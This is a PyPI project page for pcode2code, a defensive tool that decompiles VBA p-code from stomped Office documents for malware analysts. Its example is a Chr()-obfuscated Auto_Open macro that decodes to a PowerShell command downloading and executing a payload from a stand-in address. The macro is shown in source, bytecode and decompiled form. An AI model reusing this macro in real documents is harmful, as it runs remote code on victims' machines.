Skip to main content

a vba p-code decompiler based on pcodedmp

Project description

pcode2code.py - A VBA p-code decompiler

What is it?

In 2019, EvilClippy tool made easily available for any attacker to dispose of an Office document where the macro code is transformed directly into bytecode. For any reference, please check this or this. To be able to analyze such "stomped" documents, Dr. Bontchev (@VessOnSecurity) released pcodedmp, a tool printing out the VBA bytecode of a document in a readable manner. However, the output might be still hardly readable and analyzable (please check out macaroni in tests folder). As such, pcode2code decompiles, based on pcodedmp's output, the VBA code.

Kudos

Huge Kudos to Dr. Bontchev (@VessOnSecurity) who made all the hard work. Just figured out how much time should have been needed for pcodedmp to work.

example

Let's consider a document, whose code is the following:

Sub Auto_Open()
    Dim exec As String
    Dim testvar As String
    Shell Chr(112) & Chr(111) & Chr(119) & Chr(101) & Chr(114) & Chr(115) & Chr(104) & Chr(101) & Chr(108) & Chr(108) & Chr(46) & Chr(101) & Chr(120) & Chr(101) & Chr(32) & Chr(73) & Chr(69) & Chr(88) & Chr(32) & Chr(40) & Chr(40) & Chr(110) & Chr(101) & Chr(119) & Chr(45) & Chr(111) & Chr(98) & Chr(106) & Chr(101) & Chr(99) & Chr(116) & Chr(32) & Chr(110) & Chr(101) & Chr(116) & Chr(46) & Chr(119) & Chr(101) & Chr(98) & Chr(99) & Chr(108) & Chr(105) & Chr(101) & Chr(110) & Chr(116) & Chr(41) & Chr(46) & Chr(100) & Chr(111) & Chr(119) & Chr(110) & Chr(108) & Chr(111) & Chr(97) & Chr(100) & Chr(115) & Chr(116) & Chr(114) & Chr(105) & Chr(110) & Chr(103) & Chr(40) & Chr(39) & Chr(104) & Chr(116) & Chr(116) & Chr(112) & Chr(58) & Chr(47) & Chr(47) & Chr(49) & Chr(48) & Chr(46) & Chr(48) & Chr(46) & Chr(48) & Chr(46) & Chr(49) & Chr(51) & Chr(47) & Chr(112) & Chr(97) & Chr(121) & Chr(108) & Chr(111) & Chr(97) & Chr(100) & Chr(46) & Chr(116) & Chr(120) & Chr(116) & Chr(39) & Chr(41) & Chr(41)
End Sub

If you use pcodedmp on this document, you will obtain the following output:

VBA/ThisDocument - 2809 bytes
Line #0:
        FuncDefn (Sub Auto_Open())
Line #1:
        Dim
        VarDefn exec (As String)
Line #2:
        Dim
        VarDefn testvar (As String)
Line #3:
        LitDI2 0x0070
        ArgsLd Chr 0x0001
        LitDI2 0x006F
        ArgsLd Chr 0x0001
        Concat
        LitDI2 0x0077
	ArgsLd Chr 0x0001
	Concat
	LitDI2 0x0065
	ArgsLd Chr 0x0001
	Concat
	LitDI2 0x0072
	ArgsLd Chr 0x0001
	Concat
	LitDI2 0x0073
	ArgsLd Chr 0x0001
	Concat
	LitDI2 0x0068
	ArgsLd Chr 0x0001
	Concat
	LitDI2 0x0065
	ArgsLd Chr 0x0001
	Concat
	[ .... -> 252 more lines like this]
	LitDI2 0x0029
        ArgsLd Chr 0x0001
        Concat
        LitDI2 0x0029
        ArgsLd Chr 0x0001
        Concat
        ArgsCall Shell 0x0001
Line #4:
        EndSub

If you use pcode2code, the output will be the following:

stream : VBA/ThisDocument - 2809 bytes
########################################

Sub Auto_Open()
  Dim exec As String
  Dim testvar As String
  Shell Chr(112) & Chr(111) & Chr(119) & Chr(101) & Chr(114) & Chr(115) & Chr(104) & Chr(101) & Chr(108) & Chr(108) & Chr(46) & Chr(101) & Chr(120) & Chr(101) & Chr(32) & Chr(73) & Chr(69) & Chr(88) & Chr(32) & Chr(40) & Chr(40) & Chr(110) & Chr(101) & Chr(119) & Chr(45) & Chr(111) & Chr(98) & Chr(106) & Chr(101) & Chr(99) & Chr(116) & Chr(32) & Chr(110) & Chr(101) & Chr(116) & Chr(46) & Chr(119) & Chr(101) & Chr(98) & Chr(99) & Chr(108) & Chr(105) & Chr(101) & Chr(110) & Chr(116) & Chr(41) & Chr(46) & Chr(100) & Chr(111) & Chr(119) & Chr(110) & Chr(108) & Chr(111) & Chr(97) & Chr(100) & Chr(115) & Chr(116) & Chr(114) & Chr(105) & Chr(110) & Chr(103) & Chr(40) & Chr(39) & Chr(104) & Chr(116) & Chr(116) & Chr(112) & Chr(58) & Chr(47) & Chr(47) & Chr(49) & Chr(48) & Chr(46) & Chr(48) & Chr(46) & Chr(48) & Chr(46) & Chr(49) & Chr(51) & Chr(47) & Chr(112) & Chr(97) & Chr(121) & Chr(108) & Chr(111) & Chr(97) & Chr(100) & Chr(46) & Chr(116) & Chr(120) & Chr(116) & Chr(39) & Chr(41) & Chr(41)
End Sub

Installation

The script will work both in Python version 2.6+ and in Python 3.x. The simplest way to install it is from PyPi with pip:

pip install pcode2code -U

The above command will install the latest version of pcode2code (upgrading an older one if it already exists) with pcodedmp as a dependency. Indeed, it permits to have all the functionalities of the tool.

If you would rather install it from the GitHub repository, you can do it like this:

git clone 
cd pcode2code
pip install .

Usage

The script takes as a command-line argument either an OLE2 document which has been stomped, or the dump of a previously analyzed document with pcodedmp. In the latter, you should use the -p option. By default, the output of the processing is printed on console and should be valid VBA code.

The script also accepts the following command-line options:

-h, --help Displays a short explanation how to use the script and what the command-line options are.

-v, --version Displays the version of the script.

-n, --linenum Indicates if line numbers should be included within the output. Please pay attention the output code is no more valid as a VBA code.

-p, --pcodedump Indicates if the input is a previously pcodedmp's dump.

-o OUTFILE, --output OUTFILE Save the results to the specified output file, instead of sending it to the standard output.

-d, --debug Used for debugging and development purposes. Here, exceptions are not handled making the script interrupted for any error.

API

The module can be imported as such in your python script (if it's in your path)

import pcode2code

While i let all functions to be available, the following function should be used:

  • process(inputfile, outputfile=None, ispcodedump=False, linenum=False, isdebug=False) :

    realize the decompiling operation on an input. args are the following : inputfile = file to be processed, outputfile = where to write, writes to stdout by default, ispcodedump = if the input file is a previous dump of pcodedmp use this, linenum : line numbers are to be printed in the output, isdebug : wether debugging mode should be used.

    Here is an example

    import pcode2code
    pcode2code.process('~/evil.docm', 'output.txt')
    

Found a bug?

Before submitting an issue, please checks the following point:

  • your error is a generic python error/ you have a "generic exception occured" printed on screen:

    • Well, just submit the error found, with the attached document.
  • you get some "Pcode2codeException" error:

    • First, run pcodedmp on your document, and locate the problematic line and the problematic opcode
    • Second, check if the opcode is already known to be problematic for pcodedmp (on its README) or if it's already in the known problems (below)
    • if not, please submit your document, the problem, as well as the corresponding output of pcodedmp
    • if yes, well you should just wait for a new version (or contribute by yourself :) )
  • you cross-checked with the original program, and the output is wrong, even if not exception occured.

    • in this case, you should run pcodedmp on your document, and check first if pcodedmp output is meaningful (this tool relies on it)
    • if yes, then submit your bug with the document
    • if not, please ask @VessOnSecurity

Known problems

  • all limitations of pcodedmp apply here
  • Enum are translated as Type, based on pcodedmp's output
  • the following bytecode commands are not supported now: scale, all commands related to index, implements,
  • any date literal or floating point literal is not transformed back to its original form (If you now how to transform the bytes into the literal, please contact me)

Contributing

I'm fully open to any contribution, as tiny as it is. Don't hesitate to mail me or to ping me on twitter.

To be done

  • Provide a correct contributing guide, and make the code follows coding standards
  • There is always room for improvement, at least, it could be good to provide all correct opcodes translation
  • Provide a mean to detect automatically previous dump or OLE2

Change log

21 nov 2019 : version 1.0 released

25 nov 2019: version 1.1 released

  • several corrections made based on @VessOnSecurity throw-back.

Contributors

  • Zilio Nicolas, author

To go further

Obtaining the code might not be sufficient enough for an easy analysis. Don't hesitate to give a try to SourceFu to deobfuscate the code, or create a document and use ViperMonkey.

Project details


Download files

Download the file for your platform. If you're not sure which to choose, learn more about installing packages.

Source Distribution

pcode2code-0.1.1.tar.gz (387.9 kB view details)

Uploaded Source

File details

Details for the file pcode2code-0.1.1.tar.gz.

File metadata

  • Download URL: pcode2code-0.1.1.tar.gz
  • Upload date:
  • Size: 387.9 kB
  • Tags: Source
  • Uploaded using Trusted Publishing? No
  • Uploaded via: twine/3.0.0 pkginfo/1.5.0.1 requests/2.21.0 setuptools/41.1.0 requests-toolbelt/0.9.1 tqdm/4.38.0 CPython/3.7.5rc1

File hashes

Hashes for pcode2code-0.1.1.tar.gz
Algorithm Hash digest
SHA256 dff74823319adcd3925e6788b3459e0ed2783d1c006837e4f7c8fb8b1602eee9
MD5 9dc1b9604a1453cd62b6430cd1a4cf9e
BLAKE2b-256 095d06fbf07be8a08bc56fef97796b21a0366fba6b83bf1e6232388cff8d49dd

See more details on using hashes here.

Supported by

AWS AWS Cloud computing and Security Sponsor Datadog Datadog Monitoring Fastly Fastly CDN Google Google Download Analytics Microsoft Microsoft PSF Sponsor Pingdom Pingdom Monitoring Sentry Sentry Error logging StatusPage StatusPage Status page